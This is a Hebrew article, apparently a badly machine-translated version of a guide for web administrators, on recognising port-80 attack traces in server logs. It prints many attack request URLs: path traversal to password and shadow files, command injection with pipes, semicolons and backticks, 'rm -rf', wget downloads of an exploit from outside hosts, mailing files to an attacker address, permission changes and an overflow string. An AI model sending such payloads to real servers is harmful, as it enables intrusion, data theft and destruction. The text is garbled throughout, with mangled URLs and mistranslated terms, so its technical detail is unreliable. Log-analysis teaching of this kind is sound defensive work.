א סיכום
השנייה. תיאור מפורט של
השלישי. נוספת
הרביעי. ניתוח גלישה
V. ההמרה
השישי. סיכום
[] תקציר
אתר האינטרנט 80 כמו יציאת ברירת המחדל עבור השירות, על השקתו של מגוון רחב של בעיות אבטחה להרחיק כמה נקודות תורפה אלה לאפשר לפורץ לקבל גם אישור מנהל המערכת כדי להיכנס לאתר עצמו, להלן מספר 80 עקבות יציאת Zenomorph של פיגועים המחקר, ולומר לך איך למצוא את הבעיות של רשומות ביומן.
[] פירוט
כאן, בחלק דרך מספר להציג Liezi על שרתי אינטרנט ויישומים על ההתקפה הכללית שלהם, ואת עקבות שלה, אשר מייצגים רק התקפה גדולה Liezi, אין רשימה של כל צורה של התקפה, זה יהיה סעיף תיאור מפורט של התפקיד של כל תקיפה, ו שלה איך לנצל פגיעויות אלה לתקוף.
(1) "." ".." "..." וגם בקשה
עקבות של מתקפות אלו נפוצים מאוד עבור יישומי אינטרנט בשרת האינטרנט, בהם נעשה שימוש כדי לאפשר לפורץ או וירוס תולעת תוכנית לשנות את הנתיב של שרת האינטרנט, כדי לקבל גישה לאזורים סגורים. רוב תוכניות CGI עם הפגמים האלה, ".." בקשת.
דוגמה:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
זה מראה את הבקשה התוקף Liezi mosd קובץ זה, אם התוקף פריצת דרך ביכולת אינטרנט שרת השורש, ולאחר מכן לקבל מידע נוסף ולקבל זכויות נוספות.
(2) "20%" הבקשה
20% הוא הערך hex כי 16 מקומות, אך זה לא אומר שאתה יכול להשתמש בכל דבר, אבל כאשר אתה מציג את יומן ימצאו אותו, איזה יישום השרת פועל על האופי הזה עשוי להיות מיושם ביעילות לכן, כדאי בעיון רב את היומן. מצד שני, הבקשה יכולה לפעמים לעזור לבצע פקודות מסוימות.
דוגמה:
http://host/cgi-bin/lame.cgi?page=ls% | 20 אל
זה Liezi מראה התוקף לבצע פקודה יוניקס, המפרט את הקטלוג המלא של המסמכים המבוקשים, גורמת לתוקף לגשת לקבצים חשובים על המערכת שלך, כדי לעזור לו להמשיך לספק את התנאים לקבלת הרשאות.
(3) "% 00" הבקשה
00% אמרו הקסדצימלי 16 בתים ריקים, הוא הצליח להערים על יישום האינטרנט, ולבקש סוגים שונים של קבצים.
דוגמאות:
http://host/cgi-bin/lame.cgi?page=index.html
זו עשויה להיות בקשה תקפה במכונה, אם התוקף מודע לבקשה זו הצליחה, הוא יהיה עוד יותר לחפש את הנהלים CGI.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
אולי תוכנית CGI לא לקבל בקשה זו שכן היא בקשה לבדוק את סיומת שם הקובץ, כגון: סוגי html.shtml או אחרים של קבצים. רוב תוכניות אגיד לך את סוג הקובץ המבוקש אינו חוקי, הפעם זה יהיה לספר את התוקף את הקובץ המבוקש יש אופי של סיומת סוג קובץ, אז התוקף יכול לקבל את הנתיב המערכת, שם הקובץ, וכתוצאה מכך שלך למערכת מידע רגיש יותר
% Http://host/cgi-bin/lame.cgi?page=../../../../etc/motd 00html
שימו לב לבקשה זו, זה יהיה לרמות תוכנית CGI מחליט כי המסמך מקובל לקבוע את סוגי הקבצים, יישומים מסוימים כמו צ 'ק טיפש בשביל להגיש בקשה תקפה, אשר משמשת בדרך כלל התוקף השיטה.
(4) "|" הבקשה
זוהי דמות צינור, במערכת Unix, בקשה לעזרה בביצוע פקודות המערכת כמה באותו זמן.
דוגמה:
# חתול access_log | grep-i ".."
(פקודה זו תציג את רישום הבקשה "" .., נפוץ התקפות ותולעים מצא)
האם לעיתים קרובות לראות יישומי אינטרנט רבים להשתמש האופי, זה מוביל גם אזעקות שווא של IDS יומני.
בבדיקה מדוקדקת של הבקשה, כך היתרון של הפחתת אזעקות שווא של מערכות גילוי פריצה.
הנה כמה דזה-Lieh:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
פקודה זו הבקשה, להלן כמה שינויים Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20% אל | 20/etc
בקשה זו מופיעה במערכת Unix / ספרייה וכו 'של כל הקבצים
% Http://host/cgi-bin/lame.cgi?page=cat 20access_log grep% | 20% אני 20 "צולע"
הפקודה החתול ביצוע הבקשה וביצוע הפקודה grep גם, לבדוק את "צולע"
(5) ":" הבקשה
במערכות יוניקס, האופי הזה מאפשר ביצוע מספר רב של שורת הפקודה
דוגמה:
ת.ז.: uname-
(יישום הפקודה id, ואחריו ביצוע הפקודה uname)
יש תוכנית האינטרנט עם הדמות הזו, עלול לגרום IDS שלך יומני אזהרה של כישלון, כדאי לבדוק בקפידה תוכנית האינטרנט שלך, כך שתוכל לצמצם את הסיכון של כישלון התראות IDS.
(6) " " ו - "בקשה "
צריך לבדוק את יומני שלך להקליט את שתי הדמויות, מספר סיבות, הראשונה היא אופיה כי הנתונים הוסיף במסמך
דוגמה 1:
# אקו "שלך hax0red h0 h0" / etc / motd (בקשה בכתב motd המידע במסמך זה)
התוקף יכול להשתמש בקלות את הבקשה לעיל מתעסק עם דף האינטרנט שלך. כמו RDS המפורסם לנצל את התוקף משמש לעתים קרובות כדי לשנות את דף האינטרנט.
דוגמא 2:
% Http://host/something.php=Hi 20mom% 20Im% 20Bold!
Html תוכלו להבחין כי שפת הסימנים כאן, הוא גם בילה תווים " "," ", התקפות מסוג זה לא יכול לגרום לתוקף גישה למערכת, זה מבולבל אנשים חושבים שזה אינטרנט לגיטימיים באתר מידע (המוביל אנשים לבקר את הקישור הזה כדי לבקר את התוקף כדי להגדיר את הכתובת, בקשה זו עשויה להיות מקודד בתוך 16 תווים hex בצורת, כך עקבות הפיגוע הוא לא כל כך ברור)
(7) "!" בקשת
שפה משותפת על בקשה זו הדמות אס (Server Side Include) אני התקפה, אם התוקף הוא תוקף לבלבל את המשתמש לוחץ על הקישור להגדיר, ו כנ"ל.
דוגמה:
http://host1/something.php =
דזה-Lieh הוא התוקף עלול לעשות את זה לקובץ באתר host2 מ host1 המופיע מעל (כמובן, דורשים המבקרים לבקר את הגדרות החיבור של התוקף. בקשה זו ניתן להמרה 16 hex מסכת קידוד, לא מצאתי בקלות)
במקביל, גישה זו יכולה גם להפעיל את סמכותו הפקודה אתר אינטרנט
דוגמה:
http://host/something.php =
Lieh-לרוץ על המערכת מרחוק "הפקודה id", הוא יציג מזהה את אתר האינטרנט של המשתמש, בדרך כלל, "אף אחד" או "www"
צורה זו מאפשרת לכלול קבצים מוסתרים.
דוגמה:
http://host/something.php =
קבצים מוסתרים. Htpasswd לא יוצגו, אפאצ 'י יסרב לקבוע כללים כאלה. HT טופס בקשת, ואת הלוגו SSI יהיה לעקוף הגבלות כאלה, להוביל לבעיות אבטחה
(8) "," בקשת
התקפות מסוג זה ישמש לניסיון להוסיף מרחוק יישום אינטרנט נהלים PHP, זה עשוי לאפשר את ביצוע ההזמנה, אשר תלוי בהגדרות השרת, וכן גורמים אחרים בעבודה (כגון PHP להגדיר מצב בטוח)
דוגמה: http://host/something.php = passthru ("id ");?
ביישום כלשהו PHP פשוט, זה עלול להיות במערכת המרוחקת בפני משתמשי אינטרנט לאתר כדי לבצע סמכות הפיקוד המקומי
(9) "` "הבקשה
תו זה משמש לאחר מכן לבצע את הפקודה perl, הדמויות יישום אינטרנט אינו משמש לעתים קרובות, כך שאם אתה רואה את זה ביומן שלך, צריך להיזהר מאוד
דוגמה:
http://host/something.cgi = `id`
כתוב תוכנית CGI Perl האמור יוביל יישום הפקודה id
[] נוספים
החלק הבא נדון על ביצוע התקפות יותר יכול פקודה, יחד עם המסמכים המבוקשים, ואם יש לך פגם מרחוק ביצוע הפקודה, היא צריכה להיות איך לבדוק את התגלית. חלק זה רק כדי לתת לך רעיון טוב, וגם לספר את המערכת מה שקורה, התוקפים מנסים לתקוף את עקבות המערכת, אך אין רשימה של כל התוקף כדי להשתמש בפקודות ובקשות.
"/ Bin / ls"
זה בקשות הפקודה את הנתיב כולו, ביישומי אינטרנט רבים יש פירצה זו, אם אתה מתחבר במקומות רבים כגון בקשה, זה אפשרי גדול הפגיעות ביצוע מרחוק של הפקודה, אך לא בהכרח בעיה ניתן גם אזעקת שווא. פעם הזכיר שוב, יישום האינטרנט נכתב (CGI, ASP, PHP וכו '...) הוא הבסיס של הביטחון
דוגמה:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20 אל
http://host/cgi-bin/bad.cgi?doh=ls% 20-אל;
"Cmd.exe"
זה חלונות של פגז, אם לפורץ גישה להפעיל script זה בהגדרות שרת בתנאים מותר מכונת החלונות יכול לעשות שום דבר, הרבה תולעים היא דרך הנמל 80, תקשורת מכונת מרחוק
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
זה שני קבצים בינאריים, זה בעיה ו / bin / ls, כמו, אם אתה מתחבר במקומות רבים זה גדול Qingqiu זה אפשרי מרחוק 执行 פיקוד פגיעות, אבל לא בהכרח בעיה ניתן גם אזעקת שווא.
זה יראה איזה חלק שייך אשר משתמש קבוצה
דוגמה:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
פקודה זו יכולה למחוק קבצים ללא שימוש נכון מאוד מסוכן
דוגמאות:
% Http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm 20-RF 20% * |
% Http://host/cgi-bin/bad.cgi?doh=rm 20-RF 20% *;
"Wget ו TFTP" הפקודה
פקודות אלה הן לעתים קרובות התוקף עלול לקבל הרשאות נוספות כדי להוריד קבצים, wget היא פקודה תחת יוניקס, ניתן להשתמש כדי להוריד דלתות אחוריות, TFTP תחת יוניקס הפיקוד NT, משמש כדי להוריד את הקובץ. כמה תולעים IIS להפיץ את עצמם באמצעות TFTP להעתיק את הנגיף מארחים אחרים
דוגמאות:
% 20http http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget: / / host2/Phantasmp.c | http:// המארח / cgi-bin / bad.cgi? דו = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"חתול" הפקודה
פקודה זו משמשת כדי להציג את תוכן הקובץ, נהג לקרוא את המידע החשוב, כגון קבצי תצורה, הקבצים בסיסמה, קבצים אשראי ומסמכים שאתה יכול לחשוב
דוגמאות:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi? דו =% חתול 20/etc/motd;
"הד" הפקודה
פקודה זו נהג לכתוב נתונים לקובץ כגון "index.html"
דוגמאות: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "% fc-# קיווי 20here 20was%" 20% |% 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "% fc-# קיווי 20here 20was%" 20% 200day.txt %;
"תהלים" הפקודה
מפרט את תהליך מפעיל כעת, לספר את תוקף כי מארח מרוחק מפעיל את התוכנה על מנת לקבל מושג כלשהו על בעיות אבטחה, כדי לקבל הרשאות נוספות
דוגמאות: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% | 20-aux http://host/cgi-bin/bad. cgi? דו = PS% 20-aux;
"הרוג ו killall" הפקודה
יוניקס ומערכות על מנת להרוג את התהליך הזה, התוקף יכול להשתמש בפקודה זו כדי להפסיק את שירותי המערכת ואת התהליכים ניתן גם למחוק את עקבות התוקף, כמה לנצל יפיק הרבה תהליכים הילד
דוגמאות:% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% | http://host/cgi-bin/bad.cgi?doh=kill 20 -9% 200;
"Uname" הפקודה
פקודה זו אומרת התוקף שם את המכונה של מרחוק, זמן, דרך אתר זה, כדי לדעת איזה ספק שירותי האינטרנט, תוקף יכול להיות ביקר היום. Uname-לבקשה בדרך כלל, אלו יתועדו בקובץ היומן
דוגמאות:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname 20-http://host/cgi-bin/bad |. cgi? דו uname =% 20-A;
"עותק, GCC, Perl, Python, וכו '..." / אוסף הפרשנות של הפקודה
התוקף באמצעות wget או TFTP להוריד לנצל, ולהשתמש המהדר cc, gcc לקמפל את זה לתוך תוכנית הפעלה, הרשאות גישה נוספת
דוגמאות: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? דו = gcc% 20Phantasmp.c:. / a.out% 20-p% 2031337;
אם אתה מציג את יומני נמצא פיתון "" Perl "אלה ההוראות ניתן תוקף מרחוק כדי להוריד סקריפט Perl, Python, וניסו להשיג את ההרשאות של המקומיים
"דואר" הפקודה
תוקפים לעתים קרובות להשתמש במערכת הפיקוד, כמה מסמכים חשובים לתיבת הדואר האישי של התוקף, אך מוכן גם דואר אלקטרוני פיגועים מתבצעות
דוגמאות:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, וכו '..." ופקודות אחרות
יוניקס ומערכות על מנת לאפשר להם לשנות את הרשאות הקובץ
chown = מאפשר הגדרת הבעלים קובץ chmod = מאפשר להגדיר chgrp הרשאות הקובץ = מאפשר לבעל לשנות את הרשאות הקבוצה על קבצים chsh = רשאי לשנות את המעטפת של המשתמש
דוגמאות:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod 20777% 20index.html | http://host/cgi-bin/ bad.cgi? דו =% chmod 20777% 20index.html;% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20zeno% 20 / etc / http://host/cgi-bin/bad.cgi?doh=chsh master.passwd% | 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp 20nobody%% 20/etc/shadow |
"/ Etc / passwd" הקובץ
זהו קובץ הסיסמה של המערכת, בדרך כלל צל מעל, ואינה מאפשרת לראות את הסיסמה המוצפנת, אך תוקף מי יכול לדעת מה הוא חוקי המשתמש, ואת הנתיב המוחלט של המערכת, שם האתר ומידע נוסף, כמו בדרך כלל על ידי צל מעל, כך התוקף בדרך כלל תראה / etc / קובץ צל
"/ Etc / master.passwd"
קובץ זה הוא קובץ הסיסמה BSD המערכת, כולל הסיסמה המוצפנת, את הקובץ על חשבון השורש הוא רק לקריאה בלבד, וחלק תוקפים לא מיומנים פתח הניסיון שלו כדי לקרוא את התוכן הפנימי., אם האתר הוא הרשאות root לרוץ, ואז התוקף הוא, שאנחנו יכולים לקרוא את התוכן הפנימי, הרבה בעיות על מנהל המערכת יבואו בזה אחר זה
"/ Etc / צל"
מכיל סיסמה המערכת מוצפן, לקרוא אותו על חשבון השורש, ו / et / master.passwd כמעט
"/ Etc / motd"
כאשר משתמשים להיכנס למערכת יוניקס, המידע שמופיע בהודעת "של יום" קובץ, זה מספק מידע מערכת חשוב למנהל של המשתמשים להגדיר כמה, משתמשים שרוצים לראות את אלה שאינם, מכיל גם מידע גרסת מערכת, התוקף בדרך כלל לראות את הקובץ הזה, כדי להבין מה המערכת פועלת על התוקף, הצעד הבא הוא לבצע חיפוש עבור סוג זה של המערכת, לנצל, וגישה נוספת במערכת ההרשאות
"/ Etc / hosts"
המסמך מספק כתובת IP ורשת המידע, תוקף יכול ללמוד עוד על הגדרות הרשת של מערכת
"/ Usr / local / apache / conf / httpd.conf"
זהו שרת האינטרנט Apache קובץ ההגדרות, התוקף יכול להבין, כמו CGI, SSI ועוד מידע נגיש
"/ Etc / inetd.conf"
זהו קובץ התצורה שירות inetd, תוקף יכול ללמוד את המחשב המרוחק, להתחיל שירותים אלה, אם להשתמש בעטיפה כדי לשלוט בגישה, אם האורז נמצא פועל, תוקף את הצעד הבא יהיה לבדוק "/ etc / hosts.allow" ו "/" etc / hosts.deny, קובץ, ואשר עשויה לשנות כמה הגדרות, הרשאות גישה
". Htpasswd,. Htaccess, ו. Htgroup"
קבצים אלה משמשים בדרך כלל אימות אתר האינטרנט של המשתמש, על התוקף להציג קבצים אלה, ולקבל שם משתמש וסיסמה, את הקובץ בסיסמה. Htpasswd מוצפן, לפרוץ את תהליך הפענוח כמה פשוט, לאפשר לתוקף לגשת לאתר אזורים מוגנים (בדרך כלל את המשתמש עם שם משתמש וסיסמה, התוקף יכול גם לבקר את חשבון אחרים)
"Access_log ו error_log"
אלה שרת Apache קבצי לוג, התוקפים לעתים קרובות להציג קבצים אלה, להסתכל בקשות אלה נרשמות, אלה ובקשות אחרות במקומות שונים
בדרך כלל, התוקף ישנו את קבצי לוג, כגון: מידע הכתובת שלו, את התוקף דרך יציאה 80 באמצעות המערכת מערכת הגיבוי שלך גם לא עובד, אין כל תיעוד אחר תוכנית שיא המערכת מצב, שבו יהיה גילוי פריצה נעשה קשה מאוד לעבוד
"Drive [אותיות]: winntrepairsam._ או [-אות כונן]: winntrepairsam"
Windows NT סיסמת מערכת הקבצים, אם הפקודה מרחוק לא יכול להיות מיושם, התוקפים בדרך כלל לבקשה מסמכים אלה, ולאחר מכן "סדק l0pht" סוג של כלי פיצוח סיסמה כדי סדק, אם התוקף מנסה לתקוף את הקובץ והסיסמה של המנהל, אם מוצלח ואז המחשב המרוחק יהיה תוקף מקבל שליטה
[] ניתוח Overflow
במאמר זה אני לא אגיד יותר מדי על גדותיו של הנושא, אני אתן את מה מאותן תופעות וסימני לציין ואת מדאיג במיוחד, חיץ הוא תקף לעתים קרובות על ידי המרה התוקף קוד וקשה למצוא דרכים אחרות להשיג
הנה שקר פשוט דזה
דוגמה: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Liezi זו מציגה את התוקף על יישום לשלוח הרבה אופי, כדי לבדוק את התוכנית של הצפת מאגר, גלישת מאגר יכול לקבל ביצוע מרוחק הפקודה הרשאות לארח, אם הבעלים יש setuid ונהלים השורש, באמצעות הצפת, יכול לקבל גישה אל המערכת כולה, אם לא כמו תוכנית setuid, ואז הצפת הוא רק על ידי הפעלת הרשאות של אתר האינטרנט
כאן לא יכול להגיד את כל הנסיבות, אבל אתה צריך לבדוק באופן קבוע את קובץ היומן שלך, אם כי היום פתאום מצאתי הרבה בקשות, אבל בדרך כלל לא יותר מאשר בקשת, זה אומר שאתה נתון להתקפות על גדותיו, כמובן, יכול להיות גם רשת חדשה תולעת התקפה
[המרת]
כל ההתקפות שהוזכרו לעיל הבקשה, התוקף בדרך כלל יודע מערכות IDS בקשה לבדוק מכני לעתים קרובות, בדרך כלל התוקף ישתמשו בנתונים כלי המרה כדי להמיר את הפורמט התוכן המבוקש 16 הלהקה, וכתוצאה מכך IDS יתעלם בקשות אלה, אנחנו מכירים את הפגיעות CGI כלי סריקת כי הוא טוב Liezi כחוט השערה. אם להציג את יומן הזמן למצוא מספר גדול של הלהקה-16 ולא כמה תווים משותפים, אז התוקף יכול לנסות להשתמש כמה דרכים לתקוף את המערכת
דרך מהירה למצוא כי כן, היומן שלך להגיש בקשה כי 16 hex, להעתיק אותו לדפדפן, הדפדפן ניתן להמיר את הבקשה הנכונה, יוצג התוכן המבוקש, אם לא האומץ לקחת את הסיכון הזה, גבר ASCII פשוט, יכול לספק לך את הקוד הנכון.
[] סיכום
מאמר זה לא יכול לכסות את כל 80 יציאות של ההתקפה, אבל רוב הובאו יותר להתקפה הכללית, ואומר לך כיצד לבדוק את קבצי היומן שלך, ואיך להוסיף כגון מספר כללים IDS, לכתוב המטרה שלה היא אינטרנט מנהל המערכת צריך להיות מודאג ממה רעיון טוב באותו הזמן, אני מקווה שמאמר זה מסייע אינטרנט אינטרנט מפתחי התוכנית כדי לכתוב תוכניות יותר
ראוי לציין: אם יש לכם הערות והצעות, אנא שלח admin@cgisecurity.com דואר אלקטרוני.